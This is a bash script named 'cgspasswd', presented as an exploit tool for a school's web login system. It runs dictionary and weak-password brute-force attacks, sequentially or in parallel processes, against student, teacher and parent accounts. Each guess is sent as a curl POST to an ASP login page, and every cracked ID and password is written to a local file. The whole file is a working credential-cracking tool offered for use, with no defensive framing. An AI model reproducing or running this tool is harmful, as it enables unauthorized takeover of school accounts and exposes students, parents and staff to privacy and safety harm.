#!/bin/bash # cgspasswd - Country Gardern School Password exploit tool # cgspasswd is a free software, maintaince by MagicNAT Networing # Version 0.6.2 (C) MagicNAT Networking # # MUTIL-PROCESS HELP # # The mutiple process function is currently in development. You can still use it. However it # might cause some problems. # # To use MP mode, create a dir with you id dict or password dict in it, cgspasswd will start # different process for each dict files in it. # # DEFINATIONS # # id: The id of student, teacher, or parent # passwd: The passwd of student, teacher, or parent # type: The type of id, could be tea, stu, or par, stand for student, teacher, and parent # verbose: Set this to get into verbose mode. Showing all password or id tried # # cgspasswd CONFIGURE # # URL_PREFIX: The prefix of url # URL_EXTENTION: The extention of url # WEEK_PASSWD_DICT: The path to week id dict # ID_DICT: The path to ID dict # PW_DICT: The path to Password dict # ID_MP_DICT: The path to ID dict dir when using mutilple process # PW_MP_DICT: The path to Password dict dir when using mutilple process # CRACK_MP_PID: The path to pid dir of MP cracking work # WEEKPW_MP_PID: The path to pid dir of MP weekpw exploit work # CRACKED_SAVE: The path to the file to save cracked accounts function pre_config { URL_PREFIX="http://127.0.0.1:8080/mis/info/tea_info/" URL_EXTENTION="_Login.asp" WEEK_PASSWD_DICT="./dicts/wpw.dict" ID_DICT="./dicts/id.dict" PW_DICT="./dicts/pw.dict" ID_MP_DICT="./dicts/ids/" PW_MP_DICT="./dicts/pws/" #CRACK_MP_PID="./.crack_mp.pid/" #WEEKPW_MP_PID="./.weekpw_mp.pid/" CRACKED_SAVE="./cracked.txt" } function config { [[ -z $1 ]] && echo "config: Missing parameter" && return 1 case $1 in URL_PREFIX) [[ -z $2 ]] && echo $1=$URL_PREFIX && return 0 URL_PREFIX=$2 ;; URL_EXTENTION) [[ -z $2 ]] && echo $1=$URL_EXTENTION && return 0 URL_EXTENTION=$2 ;; WEEK_PASSWD_DICT) [[ -z $2 ]] && echo $1=$WEEK_PW_DICT && return 0 WEEK_PASSWD_DICT=$2 ;; ID_DICT) [[ -z $2 ]] && echo $1=$ID_DICT && return 0 ID_DICT=$2 ;; PW_DICT) [[ -z $2 ]] && echo $1=$PW_DICT && return 0 PW_DICT=$2 ;; ID_MP_DICT) [[ -z $2 ]] && echo $1=$ID_MP_DICT && return 0 ID_MP_DICT=$2 ;; PW_MP_DICT) [[ -z $2 ]] && echo $1=$PW_MP_DICT && return 0 PW_MP_DICT=$2 ;; # CRACK_MP_PID) # [[ -z $2 ]] && echo $1=$CRACK_MP_PID && return 0 # CRACK_MP_PID=$2 # ;; # WEEKPW_MP_PID) # [[ -z $2 ]] && echo $1=$WEEKPW_MP_PID && return 0 # WEEKPW_MP_PID=$2 # ;; CRACKED_SAVE) [[ -z $2 ]] && echo $1=$CRACKED_SAVE && return 0 CRACKED_SAVE=$2 ;; reset) echo -n "Reset config with pre_config... " pre_config echo "OK" ;; esac chk_conf } # help: Get help, usage: help [topic] function help { [[ -z $* ]] && echo -e "\n Available topics are: config, chk_login, chk_cracked, weekpw[_mp], crack[_mp]\n mp, new\n" && return 0 case $1 in config) # echo -e "\n CGSPASSWD CONFIGURE\n\n URL_PREFIX: The prefix of url\n URL_EXTENTION: The extention of url\n WEEK_PASSWD_DICT: The path to week id dict\n ID_DICT: The path to ID dict\n PW_DICT: The path to Password dict\n ID_MP_DICT: The path to ID dict dir when using mutilple process\n PW_MP_DICT: The path to Password dict dir when using mutilple process\n CRACK_MP_PID: The path to pid dir of MP cracking work\n WEEKPW_MP_PID: The path to pid dir of MP weekpw exploit work\n CRACKED_SAVE: The path to the file to save cracked accounts\n\n Usage: config [value]\n config reset\n" echo -e "\n CGSPASSWD CONFIGURE\n\n URL_PREFIX: The prefix of url\n URL_EXTENTION: The extention of url\n WEEK_PASSWD_DICT: The path to week id dict\n ID_DICT: The path to ID dict\n PW_DICT: The path to Password dict\n ID_MP_DICT: The path to ID dict dir when using mutilple process\n PW_MP_DICT: The path to Password dict dir when using mutilple process\n CRACKED_SAVE: The path to the file to save cracked accounts\n\n Usage: config [value]\n config reset\n" ;; chk_login) echo -e "\n Check a login, usage: chk_login \n id: The id of student, teacher, or parent\n passwd: The passwd of student, teacher, or parent\n type: The type of id, could be tea, stu, or par, stand for student, teacher, \n and parent\n" ;; chk_cracked) echo -e "\n Check for the logins that already cracked for failure\n Usage: chk_cracked [verbose]\n verbose: Set this to get into verbose mode. Showing all password or id tried\n" ;; weekpw|weekpw_mp) echo -e "\n weekpw[_mp]: Find week passwords with id dict and weekpasswd dict\n Usage: weekpw[_mp] [verbose]\n using '_mp' will enable Mutli-Process, see help mp for more informations.\n type: The type of id, could be tea, stu, or par, stand for student, teacher,\n and parent\n verbose: Set this to get into verbose mode. Showing all password or id tried\n" ;; crack|crack_mp) echo -e "\n crack[_mp]: Crack the password of an id.\n Usage: crack[_mp] [verbose]\n using '_mp' will enable Mutli-Process, see help mp for more informations.\n id: The id of student, teacher, or parent\n type: The type of id, could be tea, stu, or par, stand for student, teacher,\n and parent\n verbose: Set this to get into verbose mode. Showing all password or id tried\n" ;; mp) echo -e "\n MUTIL-PROCESS HELP\n \n The mutiple process function is currently in development. You can still use \n it. However it might cause some problems. \n\n To use MP mode, create a dir with you id dict or password dict in it, \n cgspasswd will start different process for each dict files in it.\n" ;; new) echo -e "\n new: Start a command in backgound.\n This will be helpful when you are trying to runing mutil tasks.\n Usage: new \n" ;; *) echo -e "\n Help topic $1 not found. $(help)\n" ;; esac } # chk_login: Check a login, usage: chk_login function chk_login { [[ -z $3 ]] && echo "chk_login: Missing parameters" && return 1 [[ ! -z $(curl --data "t1=$1&t2=$2" $URL_PREFIX$3$URL_EXTENTION 2> /dev/null | grep moved) ]] && echo "true" && return 0 echo "false" && return 1 } # chk_cracked: Check for the logins that already cracked for failurem, usage: chk_cracked [verbose] function chk_cracked { [[ ! -e $CRACKED_SAVE ]] && echo "chk_cracked: Cracked account file $CRACKED_SAVE not exist." && return 1 ACCTLIST=$(cat creaked.txt | sed -e "s/.*Type //g" | sed -e "s/ ID //g" | sed -e "s/ Password //g") for acct in $ACCTLIST do typ=$(echo $acct | awk -F, '{print $1}') id=$(echo $acct | awk -F, '{print $2}') passwd=$(echo $acct | awk -F, '{print $3}') [[ ! -z $1 ]] && echo -n "Tesing login $id($typ) with $passwd... " [[ $(chk_login $id $passwd $typ) == "false" ]] && echo "Account $id, type $typ, is not able to login with $psswd now." || echo "OK" done } # weekpw: Find week passwords with id dict and weekpasswd dict, usage: weekpw [verbose] function weekpw { [[ -z $1 ]] && echo "weekpw: Missing parameters" && return 1 for id in $( cat $ID_DICT ) do for passwd in $(cat $WEEK_PASSWD_DICT) do [[ ! -z $2 ]] && echo "Trying login $id($1) with $passwd... " [[ $( chk_login $id $passwd $1 ) == "true" ]] && write_cracked $id $passwd $1 && break done done } # weekpw_mp: Find week passwords with id dicts and weekpasswd dict using MP, usage: weekpw_mp [verbose] function weekpw_mp { [[ -z $1 ]] && echo "weekpw_mp: Missing parameters" && return 1 for dict in $(ls $ID_MP_DICT) do weekpw_mp_core $ID_MP_DICT$dict $1 $2 & done } # Internal function, core module of weekpw_mp, should not be called by user. function weekpw_mp_core { [[ -z $2 ]] && echo "weekpw_mp_core: Missing parameters" && return 1 #echo $$ > $WEEKPW_MP_PID$$ for id in $(cat $1) do for passwd in $(cat $WEEK_PASSWD_DICT) do [[ ! -z $3 ]] && echo "Trying login $id($2) with $passwd... " [[ $( chk_login $id $passwd $2 ) == "true" ]] && write_cracked $id $passwd $2 && break done done #rm $WEEKPW_MP_PID$$ } # crack: Crack the password of an id, usage: crack [verbose] function crack { [[ -z $2 ]] && echo "crack: Missing parameters" && return 1 for passwd in $(cat $PW_DICT) do [[ ! -z $3 ]] && echo "Trying login $1($2) with $passwd... " [[ $( chk_login $1 $passwd $2 ) == "true" ]] && write_cracked $1 $passwd $2 && break done } # crack_mp: Crack the password of an id using MP, usage: crack [verbose] function crack_mp { [[ -z $2 ]] && echo "crack_mp: Missing parameters" && return 1 for dict in $(ls $PW_MP_DICT) do crack_mp_core $PW_MP_DICT$dict $1 $2 $3 & done } # Internal function, core module of crack_mp, should not be called by user. function crack_mp_core { [[ -z $3 ]] && echo "crack_mp_core: Missing parameters" && return 1 #echo $$ > $CRACK_MP_PID$$ for passwd in $(cat $1) do [[ ! -z $4 ]] && echo "Trying login $2($3) with $passwd... " [[ $( chk_login $2 $passwd $3 ) == "true" ]] && write_cracked $2 $passwd $3 && break done #rm $CRACK_MP_PID$$ } # Internal function, write creaked account, should not be called by user. function write_cracked { [[ -z $3 ]] && echo "write_cracked: Missing parameters" && return 1 MSG="[$(date)] CRACKED: Type $3, ID $1, Password $2" echo $MSG echo $MSG >> $CRACKED_SAVE return 0 } # Interactive mode function interactive { echo "cgspasswd 0.6 (Interactive mode) " echo "Copyright 2014 MagicNAT Networking" echo "This is free software with ABSOLUTELY NO WARRANTY." echo "For help, type help" while true do echo -n "cgspasswd> "; read cmd; if [[ ! -z $cmd ]] then exe=$(echo $cmd | awk '{print $1}') if ! type "$exe" > /dev/null 2> /dev/null then echo "cgspasswd: command not found: $exe" else $cmd fi fi done } # Init cgspasswd function cgsinit { pre_config chk_conf # mpinit } # Config check function chk_conf { for files in $WEEK_PASSWD_DICT $ID_DICT $PW_DICT $ID_MP_DICT $PW_MP_DICT do # [[ ! -e $files || -z $URL_PREFIX || -z $URL_EXTENTION || -z $CRACK_MP_PID || -z $WEEKPW_MP_PID ]] && echo "Something wrong, cgspasswd will now exit." && exit 1 [[ ! -e $files || -z $URL_PREFIX || -z $URL_EXTENTION ]] && echo "Something wrong, cgspasswd will now exit." && exit 1 done } # Init MP mode # #function mpinit { # mkdir $WEEKPW_MP_PID # mkdir $CRACK_MP_PID #} # new: Start a command background, usage: new function new { [[ -z $* ]] && return 0 if ! type "$1" > /dev/null 2> /dev/null then echo "new: command not found: $*" else $* & fi } # exit cgspasswd function exit { pkill -9 -P $$ > /dev/null 2> /dev/null kill -9 $$ > /dev/null 2> /dev/null } # Main function function main { cgsinit trap 'exit' 2 3 15 [[ -z $* ]] && interactive $* } # Call main main $*